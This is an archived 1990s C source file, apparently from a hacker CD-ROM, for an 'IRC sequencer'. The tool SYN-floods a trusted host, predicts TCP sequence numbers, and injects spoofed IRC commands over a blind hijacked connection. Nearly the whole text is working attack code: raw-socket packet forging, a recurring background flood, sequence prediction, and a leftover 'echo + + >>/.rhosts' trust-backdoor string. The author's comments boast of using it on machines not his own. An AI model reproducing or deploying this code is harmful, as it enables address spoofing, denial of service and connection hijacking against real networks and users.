HaCKeRz Kr0nlcKLeZ 1

home *** CD-ROM | disk | FTP | other *** search

/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / ircscripts / warirc / ircseq28.c < prev next >

Wrap

C/C++ Source or Header | 1996-04-23 | 18.7 KB | 544 lines

/* IRC SEQUENCER V2.8 The first version of irc just made a person choose a nick and join a channel, which was pretty lame. This version is actually interactive to a point. You can issue all the commands you can in normal irc, you just can't read anything. Its a they-see-you but you-dont-see them client. Anyways, this too needs the kernel modification to run. Enjoy! 2.0-2.5 Update - In 2.0, if you spoofed as a host that was actually up, it would have the connection killed in 60 seconds, because it would recover from the flood and RST the packets it gets. I added some code to flood the host in the background every 40 seconds, so you can maintain a session. 2.5-2.6 Update - I wanted to use this proggy on machines that were not my own. So, in phear that people would steal muh binaries I added a quick little random challenge thing. It is by no means secure, anyone with access to a debugger, could figure out the algorithm and write a passkey generator. But it thwarts most people from using my warez. 2.6-2.8 Update - Added in a much more reliable sequence number prediction method, works almost all the time. I also added in a quick little parser thingy so you don't have to type irc raw commands. Oh btw.. I wrote this a long, long time ago, not planning on anyone to see it. It was written to be used, by me. Not to be viewed. So yes, this coding sucks fucking shit, but it served its purpose for me. So if you don't like it then fuck you. Oh yeah, this will only work with linux, fuck head. Deathstar [SM] 1995 */ #include <sys/types.h> #include <sys/socket.h> #include <linux/errno.h> #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <linux/fcntl.h> #include <netdb.h> #include <stdio.h> #define FAKE_HOST "31.3.3.3" #define NUM_HOSE 80 #define NUM_TESTS 5 #define SERV_TCP_PORT 5432 #define QLEN 5 #define PACKETSIZE ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define offsetTCP ( sizeof(struct iphdr) ) #define offsetIP ( sizeof( struct iphdr ) + sizeof(struct tcphdr) + 5 ) #define offsetICMP ( sizeof( struct iphdr ) ) #define offsetRIP ( 0 ) struct iphdr temp_ip; static int thecode; int againrun=0; int temp_socket=0; u_short cksum( u_short *, int ); unsigned short tcp_check(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr); void read_packet(); int verify(); u_short cksum( u_short *buf, int nwords ) { unsigned long sum; for ( sum = 0; nwords > 0; nwords -- ) sum += *buf++; sum = ( sum >> 16) + ( sum & 0xffff ); sum += ( sum >> 16 ); return ~sum ; } void fill_sockhost(struct sockaddr_in *addr, char *hostname) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); address->sin_family = AF_INET; address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { host = gethostbyname(hostname); if (host) { bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { puts("Couldn't resolve address!!!"); exit(-1); } } } void fill_sockport(struct sockaddr_in * addr, u_short port) { addr->sin_port = htons(port); } int get_socket(void) { int sock = 0; if ( !sock ) { sock = socket( AF_INET, SOCK_RAW, 255 ); if ( sock == -1 ) { perror("Getting raw socket"); exit(-1); } } printf("[Socket %i gotten]\n",sock); return((int)sock); } void get_packet(char *packet) { packet = (char *)malloc( PACKETSIZE ); if ( !packet ) { perror("Getting space for packet"); exit(-1); } printf("[Packet space malloced]\n"); } void send_pack( struct sockaddr_in local, int fromport, struct sockaddr_in remote, int toport, ulong sequence, int sock, u_char theflag, ulong acknum, char * packdata, int datalen ) { char * packet; int tempint; if(datalen>0) datalen++; packet = (char *)malloc( PACKETSIZE + datalen); if ( !packet ) { perror("Getting space for packet"); exit(-1); } tempint=toport; toport=fromport; fromport=tempint; { struct tcphdr * fake_tcp; fake_tcp = ( struct tcphdr *)( packet + offsetTCP ); fake_tcp->th_dport = htons(fromport); fake_tcp->th_sport = htons(toport); fake_tcp->th_flags = theflag; fake_tcp->th_seq = htonl(sequence); fake_tcp->th_ack = htonl(acknum); fake_tcp->th_off = (sizeof(struct tcphdr))/4; fake_tcp->th_win = 2; } if (datalen>0) { char *crap; crap = ( char * ) ( packet + offsetTCP + sizeof(struct tcphdr) ); for(tempint=0;tempint<datalen-1;tempint++) { *crap=*packdata; *crap++; *packdata++; } *crap='\r'; } { struct iphdr * real_ip; real_ip = ( struct iphdr *)packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons(PACKETSIZE+datalen); real_ip->tos = 0; real_ip->ttl = 64; real_ip->protocol = 6; real_ip->check = 0; real_ip->id = 10786; real_ip->frag_off = 0; bcopy( (char *)&local.sin_addr, &real_ip->daddr, sizeof( real_ip->daddr ) ); bcopy( (char *)&remote.sin_addr,&real_ip->saddr, sizeof( real_ip->saddr ) ); temp_ip.saddr = htonl( ntohl(real_ip->daddr )); real_ip->daddr = htonl( ntohl(real_ip->saddr )); real_ip->saddr = temp_ip.saddr; real_ip->check = cksum( (u_short *)packet, sizeof( struct iphdr) >> 1 ); { struct tcphdr *another_tcp; another_tcp = ( struct tcphdr * )(packet + offsetTCP ); another_tcp->th_sum=0; another_tcp->th_sum=tcp_check(another_tcp,sizeof(struct tcphdr)+datalen, real_ip->saddr, real_ip->daddr); } } { int result; sock=(int)temp_socket; result = sendto( sock, packet, PACKETSIZE+datalen, 0, (struct sockaddr *)&remote, sizeof( remote ) ); if ( result != PACKETSIZE+datalen ) { perror("sending packet" ); } } free(packet); } void send_packet( struct sockaddr_in local, int fromport, struct sockaddr_in remote, int toport, ulong sequence, int sock, u_char theflag, ulong acknum, char * packdata, int datalen ) { int i; for(i=0;i<10;i++) { send_pack(local,fromport,remote,toport,sequence,sock,theflag,acknum ,packdata,datalen); usleep(10000); } } void hose_trusted( char * fromhost, struct sockaddr_in remote, ulong toport, ulong sequence[NUM_HOSE], ulong ports[NUM_HOSE], int socks[NUM_HOSE] , ulong fromport) { int i=0; u_long start_seq=4935835+getpid(); /* Make this anything you want */ u_long start_port=1100; /* Make this anything you want */ struct sockaddr_in local; start_seq=start_seq/40; fill_sockhost( (struct sockaddr *)&local, fromhost); fill_sockport( (struct sockaddr *)&local, fromport); /*fill_sockhost( (struct sockaddr *)&remote, tohost); fill_sockport( (struct sockaddr *)&remote, toport);*/ fill_sockhost( (struct sockaddr *)&local, fromhost); fill_sockport( (struct sockaddr *)&local,fromport); for(i=0;i<NUM_HOSE;i++) { socks[i]=(int)socks[0]; ports[i]=start_port++; /* record the ports and sequence numbers */ sequence[i]=start_seq++; /* for later reseting */ fill_sockport( (struct sockaddr *)&local, ports[i]); temp_socket=(int)socks[i]; send_pack(local, ports[i], remote, toport , sequence[i], (int)socks[i], TH_SYN,0,NULL,0 ); send_pack(local, ports[i], remote, 113, sequence[i], (int)socks[i], TH_SYN,0,NULL,0 ); } } void reset_trusted( char * fromhost, char * tohost, ulong toport, ulong sequence[NUM_HOSE], ulong ports[NUM_HOSE], int socks[NUM_HOSE] ) { int i=0; u_long start_seq=4935835+getpid(); /* Make this anything you want */ u_long start_port=1100; /* Make this anything you want */ struct sockaddr_in local, remote; start_seq=start_seq/40; fill_sockhost( (struct sockaddr *)&local, fromhost); fill_sockport( (struct sockaddr *)&local, 513); fill_sockhost( (struct sockaddr *)&remote, tohost); fill_sockport( (struct sockaddr *)&remote, toport); fill_sockhost( (struct sockaddr *)&local, fromhost); fill_sockport( (struct sockaddr *)&local,513); for(i=0;i<NUM_HOSE;i++) { printf("[Sending RST %i]\n",i); socks[i]=(int)socks[0]; ports[i]=start_port++; /* record the ports and sequence numbers */ fill_sockport( (struct sockaddr *)&local, ports[i]); printf("[socket=%i port=%i local=%s remote=%s]\n",socks[i],ports[i],fromhost,tohost); temp_socket=(int)socks[i]; send_pack(local, toport, remote, ports[i], sequence[i], (int)socks[i], TH_RST,0,NULL,0); } close(socks[0]); } void get_text(char *intext, char *outtext) { int i; for(i=2;i<strlen(intext);i++) outtext[i-3]=intext[i]; outtext[strlen(intext)-3]='\0'; } int spoof_connection(struct sockaddr_in local, struct sockaddr_in remote, ulong fromport, ulong sequence, ulong offset, int sock,char *username, char *nickname, char *channel,int socks[NUM_HOSE] ) { char *string="0\0root\0root\0echo + + >>/.rhosts\0"; char *ostring,*istring; char *tmpshit; int stringlen=32; int doit=1; u_long seq=385773357; u_long seqs[NUM_HOSE], ports[NUM_HOSE]; u_long tmpseq=0; sock=(int)get_socket(); string=(char *)malloc(300); ostring=(char *)malloc(300); istring=(char *)malloc(300); printf("[Sending spoofed SYN]\n"); send_packet(local, fromport, remote, 6667, seq++, sock, TH_SYN,0,NULL,0 ); sleep(3); /* wait for the other side to SYN,ACK */ printf("[Sending predicted SYN/ACK]\n"); send_packet(local, fromport, remote,6667, seq, sock, TH_ACK,++sequence,NULL,0 ); sleep(2); printf("%u=seq %u=ack\n",seq,sequence); printf("[Spoofing irc connection as nick %s on channel #%s]\n",nickname,channel); sprintf(string,"USER %s . . :%s\nNICK %s\nJOIN #%s\n",username,username,nickname,channel); stringlen=strlen(string); send_packet(local, fromport, remote,6667, seq, sock,TH_ACK| TH_PUSH,sequence,string,stringlen); seq+=strlen(string)+1; if(againrun==0) { switch (fork()) { case 0: while(1) { sleep(20); hose_trusted(FAKE_HOST,local,23,seqs,ports,socks,1000); } break; case -1: printf("[Error spawning background flooding process!]\n"); exit(-1); break; } } while((strcmp(string,"/quit"))&&(strcmp(string,"/again"))) { gets(string); if(!(string[0]=='/')) { sprintf(ostring,"PRIVMSG #%s :%s\n",channel,string); printf("> %s\n",string); } else { get_text(string,istring); if (string[1]=='r') { printf("RAW: %s\n",istring); sprintf(ostring,"%s\n",istring); } if (string[1]=='j') { printf("*** You are joining %s\n",istring); sprintf(ostring,"JOIN %s\n",istring); strcpy(channel,istring); } if (string[1]=='m') { printf("-> %s\n",istring); sprintf(ostring,"PRIVMSG %s\n",istring); } else if(string[1]=='n') { printf("*** %s is now known as %s\n",nickname,istring); sprintf(ostring,"NICK %s\n",istring); strcpy(nickname,istring); } else if(string[1]=='k') { printf("*** %s\n",istring); sprintf(ostring,"KICK %s\n",istring); } else if(string[1]=='t') { printf("*** %s has changed the topic on %s to %s\n",nickname,channel,istring); sprintf(ostring,"TOPIC #%s :%s\n",channel,istring); } else sprintf(ostring,"%s\n",istring); } stringlen=strlen(ostring); send_packet(local, fromport, remote,6667, seq, sock,TH_ACK| TH_PUSH,sequence,ostring,stringlen); seq+=stringlen+1; } if(!strcmp(string,"/quit")) doit=0; if(!strcmp(string,"/again")) againrun=1; printf("[Closing connection]\n"); send_packet(local, fromport, remote, 6667, seq, sock, TH_RST,sequence,NULL,0 ); return(doit); } void get_sequence(char * tohost, char * fromhost, ulong toport, ulong *next_seq, ulong *offset,int sock, struct sockaddr_in * trusted, struct sockaddr_in * target, char *trustedhost, ulong trustedport ) { int i; u_long start_seq=4138353+getpid(); u_long start_port=1234; u_long my_addr; char *buf; struct hostent *he; struct iphdr *iph; struct tcphdr * tcph; u_long prev_seq=0, diff=0,curr_seq; int sd=0; int socks[NUM_TESTS],ports[NUM_TESTS]; u_long seq[NUM_TESTS]; struct sockaddr_in local,remote; struct sockaddr whereto; int wheretolen,length; char * flake; int remotelen=0; *offset=0; fill_sockhost( (struct sockaddr *)&local, fromhost); fill_sockhost( (struct sockaddr *)&remote, tohost); fill_sockport( (struct sockaddr *)&remote, toport); fill_sockport( (struct sockaddr *)&local, 600); fill_sockhost( (struct sockaddr *)trusted, trustedhost); fill_sockport( (struct sockaddr *)trusted, trustedport); fill_sockhost( (struct sockaddr *)target, tohost); fill_sockport( (struct sockaddr *)target, toport); flake=(char *)malloc(4500); if ((sd=socket(AF_INET, SOCK_RAW, 6))<0) perror("socket"); printf("[Listening Socket %i Activated]\n",sd); socks[0]=sock; printf("[Sending Socket %i Activated]\n",socks[0]); for (i=0;i<NUM_TESTS;i++) { printf("[Test %i Started]\n",i); ports[i]=start_port; socks[i]=(int)socks[0]; seq[i]=start_seq++; printf("[port=%i socket=%i seq=%u local=%s remote=%s]\n",ports[i],socks[i],start_seq,fromhost,tohost); send_pack(local, ports[i], remote, 23, seq[i], (int)socks[i], TH_SYN,0,NULL,0); remotelen=sizeof(whereto); for(;;) { length=recvfrom(sd,flake,4096,0,&whereto,&remotelen); if(length<0) { perror("test"); exit(0); } tcph = ( struct tcphdr *)( flake + offsetTCP ); printf("[seq=%u ack=%u]\n",seq[i],ntohl(tcph->th_ack)); if (ntohs(tcph->th_dport)==start_port && ntohs(tcph->th_sport)==23 && (ntohl(tcph->th_ack)-1)==seq[i]) { curr_seq=ntohl(tcph->th_seq); if (prev_seq) { diff=curr_seq-prev_seq; printf("(sequence #=%u\n",curr_seq); } else diff=0; if (*offset==0) *offset=diff; else { if (*offset!=diff) printf("New Sequence Offset=%u\n", diff); *offset=diff; } prev_seq=ntohl(tcph->th_seq); *next_seq=prev_seq+*offset; tcph->th_seq=0; break; } } } } main( int argc, char ** argv ) { int i,codes,doit=1; ulong seqs[NUM_HOSE]; ulong ports[NUM_HOSE]; char *fakehost,*hosta,*hostb,*hostc; struct sockaddr_in trusted,target,llocal; ulong sequen=0,offset=0; int tempsock=0; int socks[NUM_HOSE]; if ( argc < 7 ) { puts("IRC SEQUENCER V2.8 - Written by Deathstar\n"); puts("usage:<fromhost><ircserver><unreachhost><yourhost><username><nickname><channel>" ); exit(-1); } /*if(!(verify()==0)) { printf("Permission denied.\n"); exit(1); } printf("Access granted.\n");*/ if ( argc > 3 ) fakehost=argv[3]; else fakehost=FAKE_HOST; if ( argc > 4 ) hostc=argv[4]; else hostc="33.33.33.33"; fill_sockhost( (struct sockaddr *)&llocal, argv[1]); fill_sockport( (struct sockaddr *)&llocal, 23); socks[0]=(int)get_socket(); printf("[Flooding real host]\n"); hose_trusted(fakehost,llocal,23,seqs,ports,socks,1000); tempsock=socks[0]; while(doit>0) { printf("[tempsock=%i]\n",tempsock); printf("[Getting Sequence Numbers]\n"); get_sequence(argv[2],hostc,513,&sequen,&offset,socks[0],&trusted,&target, argv[1],514 ); offset=0; doit=spoof_connection(trusted,target,23,sequen,offset,tempsock,argv[5],argv[6],argv[7], socks ); } printf("[Resetting remote host]\n"); socks[0]=tempsock; reset_trusted(fakehost,argv[1],23,seqs,ports,socks); } unsigned short tcp_check(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr) { unsigned long sum; __asm__("\taddl %%ecx, %%ebx\n\t" "adcl %%edx, %%ebx\n\t" "adcl $0, %%ebx" : "=b"(sum) : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256) : "bx", "cx", "dx" ); __asm__("\tmovl %%ecx, %%edx\n\t" "cld\n\t" "cmpl $32, %%ecx\n\t" "jb 2f\n\t" "shrl $5, %%ecx\n\t" "clc\n" "1:\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "loop 1b\n\t" "adcl $0, %%ebx\n\t" "movl %%edx, %%ecx\n" "2:\t" "andl $28, %%ecx\n\t" "je 4f\n\t" "shrl $2, %%ecx\n\t" "clc\n" "3:\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "loop 3b\n\t" "adcl $0, %%ebx\n" "4:\t" "movl $0, %%eax\n\t" "testw $2, %%dx\n\t" "je 5f\n\t" "lodsw\n\t" "addl %%eax, %%ebx\n\t" "adcl $0, %%ebx\n\t" "movw $0, %%ax\n" "5:\t" "test $1, %%edx\n\t" "je 6f\n\t" "lodsb\n\t" "addl %%eax, %%ebx\n\t" "adcl $0, %%ebx\n" "6:\t" "movl %%ebx, %%eax\n\t" "shrl $16, %%eax\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b"(sum) : "0"(sum), "c"(len), "S"(th) : "ax", "bx", "cx", "dx", "si" ); return((~sum) & 0xffff); } int verify() { unsigned long s1 = 5492,s2=1922,s3=8095; unsigned long seed=0; unsigned long randomnum; unsigned long response; srand((unsigned)time(NULL)); randomnum = (random()+1000)*1000+10000000+random()+(random()*500); seed = random(); if (seed<10000) randomnum=randomnum/2; else if (seed>10000) randomnum=randomnum*2; if(randomnum<10000000) seed=s1; else if(randomnum>15000000) seed=s2; else seed=s3; printf("Random Challenge: %ld\n",randomnum); printf("Enter response: "); scanf("%ld",&response); if(!(response==((randomnum/(seed/3)*6)+seed*2)+(randomnum/30))) return(1); else return(0); }